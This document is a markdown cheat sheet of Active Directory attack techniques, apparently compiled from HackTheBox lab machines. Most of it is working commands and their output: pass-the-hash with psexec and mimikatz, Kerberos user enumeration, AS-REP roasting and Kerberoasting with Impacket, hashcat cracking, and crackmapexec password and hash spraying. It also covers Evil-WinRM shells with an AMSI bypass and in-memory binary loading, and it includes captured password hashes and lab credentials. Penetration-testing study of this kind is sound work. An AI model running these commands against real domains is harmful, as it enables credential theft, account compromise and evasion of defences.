Skip to content

Latest commit

 

History

History
257 lines (177 loc) · 12.6 KB

exploiting-ad.md

File metadata and controls

257 lines (177 loc) · 12.6 KB

Exploiting AD

{% hint style="info" %} nice cheatsheet https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet {% endhint %}

TRy an log in with a hash password for user administrator

psexec.py administrator@dead:beef::b885:d62a:d679:573f -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe -port 445

Validate users against AD

Kerbrute is a tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication

First you need to add the host under /etc/hosts

-t 100 = to increase the number of thread to 100

echo "10.10.174.211 spookysec.local" | sudo tee -a /etc/hosts
~/tools/kerbrute userenum -d spookysec.local --dc spookysec.local  users -t 100

~/tools/kerbrute userenum -d htb.local --dc apt.htb users -t 100

# cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali
dead:beef::b885:d62a:d679:573f apt.htb htb.local

Abusing Kerberos

ASREPRoasting

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege "Does not require Pre-Authentication" set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

Retrieving Kerberos Tickets

Impacket has a tool called "GetNPUsers.py" (located in impacket/examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that's necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.

/home/kali/impacket/build/scripts-3.9/GetNPUsers.py spookysec.local/ -no-pass -usersfile valid_users 

for user in $(cat forest_users); do GetNPUsers.py -no-pass -dc-ip 10.129.146.146 htb/${user} |  grep -v Impacket; done
[*] Getting TGT for Administrator
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:539f1ac4ce220e575438060bd3699a29$c1a1596aef210a178e49eb968451a3c49f65f5dc024e5786706444b2fdeb3d60f0dae4b8ae4cb2cfb2c1cbd16e71f9f58ab71f1dc3502abad2d7757807461078048414d8dc500e04fa07e1dd1d60282e422f4fd9a03c5e66616ca46f8e3be0271165cb36871052af7a5bfd462c0d672a74b387b4674af980ad6509f1779c5860f02806f3a437d6256fe2fd9b3da60cf61471638b9eede87aba528c5a4df1907cf1b9e2e38ca61b4400c7526909772275283830ecb6117cda802ed788c1c4f7d475aae972aa544bcbeb3c80e6267afeb123067249d2fd944cb38d823d5ab10d11

Service Principal Names (SPNs)

GetUserSPNs.py   active.htb/svc_tgs  -dc-ip 10.129.73.237 -request

Crack SPN hash with hashcat

hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

Get AD Users

GetADUsers.py -all  active.htb/svc_tgs  -dc-ip  10.129.75.99

crackmapexec

with hash
$ crackmapexec smb apt.htb -u henry.vinson -H 2de80758521541d19cabba480b260e8f
SMB         apt.htb         445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         apt.htb         445    APT              [-] htb.local\henry.vinson:2de80758521541d19cabba480b260e8f STATUS_LOGON_FAILURE 

with password
kali@kali:~/htb$ crackmapexec smb 10.129.96.155  -u marko -p 'Welcome123!' --continue-on-success

Or try with a list of hashes. Be aware that if the box has has wail2ban installed, it will prevent this kind of bruteforce attack. You might have to reset the box to get it back.

$ crackmapexec smb htb.local -u henry.vinson -H hashes
SMB         apt.htb         445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         apt.htb         445    APT              [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE 
SMB         apt.htb         445    APT              [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE 
SMB         apt.htb         445    APT              [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE 
SMB         apt.htb         445    APT              [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb STATUS_LOGON_FAILURE 
SMB         apt.htb         445    APT              [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211 STATUS_LOGON_FAILURE

sekurlsa::pth /user:henry.vinson /domain:htb.local /dc:htb.local /ntlm:e53d87d42adaa3ca32bdb34a876cbffb /command:powershell

Password Spraying with crackmapexec

kali@kali:~/htb$ crackmapexec smb 10.129.96.155  -u resolute_users -p 'Welcome123!' --continue-on-success
SMB         10.129.96.155   445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE

Zerologon

https://github.com/risksense/zerologon

Getting a shell

Evil-WinRM

kali@kali:~$ evil-winrm -i htb.local -u henry.vinson_adm -p 'G1#Ny5@2dvht'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

With Evil-WinRM you can also bypass Windows Defender

Evil-WinRM* PS C:\Users\henry.vinson_adm\appdata\local\temp> menu

   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (`     '`    ("     )  )'     ,'   .  ,)
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /    
        \/                               \/          \/       \/         \/      
              By: CyberVaca, OscarAkaElvis, Laox @Hackplayers

[+] Bypass-4MSI
[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary

*Evil-WinRM* PS C:\Users\henry.vinson_adm\appdata\local\temp> Bypass-4MSI
[+] Patched! :D

Now I can use Invoke-Binary to load an EXE from my system into memory:

*Evil-WinRM* PS C:\Users\henry.vinson_adm\appdata\local\temp> Invoke-Binary /opt/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe
...[snip]...

This method of running does seem to cache all the output and then dump it once the process is complete, so it can take some patience to wait for output to come

wmiexec.py

wmiexec.py active.htb/administrator:[email protected]

psexec.py

psexec.py active.htb/administrator:[email protected]

runas

From a Windows machine in cmd:

runas /netonly /user:active.htb\svc_tgs cmd

dir \\10.129.75.99\Users

Check powershell history

Evil-WinRM* PS C:\Users\henry.vinson_adm\AppData\Roaming\microsoft\windows\powershell\PSREadline> ls


    Directory: C:\Users\henry.vinson_adm\AppData\Roaming\microsoft\windows\powershell\PSREadline


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/10/2020  10:58 AM            458 ConsoleHost_history.txt

*Evil-WinRM* PS C:\Users\henry.vinson_adm\AppData\Roaming\microsoft\windows\powershell\PSREadline> cat ConsoleHost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}

According to the docs, level of 2 means:

Client devices use NTLMv1 authentication, and they use NTLMv2 session security if the server supports it. Domain controllers accept LM, NTLM, and NTLMv2 authentication.

NTLMv1 is insecure, and can be abused. I’ll verify it is set that way on APT:

*Evil-WinRM* PS C:\> Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel


lmcompatibilitylevel : 2
PSPath               : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
PSParentPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
PSChildName          : Lsa
PSDrive              : HKLM
PSProvider           : Microsoft.PowerShell.Core\Registry

Enumerate registry

When a user logs in, their registry hive is mounted to HKCU , which is unique to each user. However, user hives can also be accessed via the HKEY_USERS (HKU) hive. This stores registry entries for all users on the system. Impacket's reg.py can be used to enumerate the registry.

reg.py -hashes :e53d87d42adaa3ca32bdb34a876cbffb htb.local/[email protected] query -keyName HKU\\Software\\GiganticHostingManagementSystem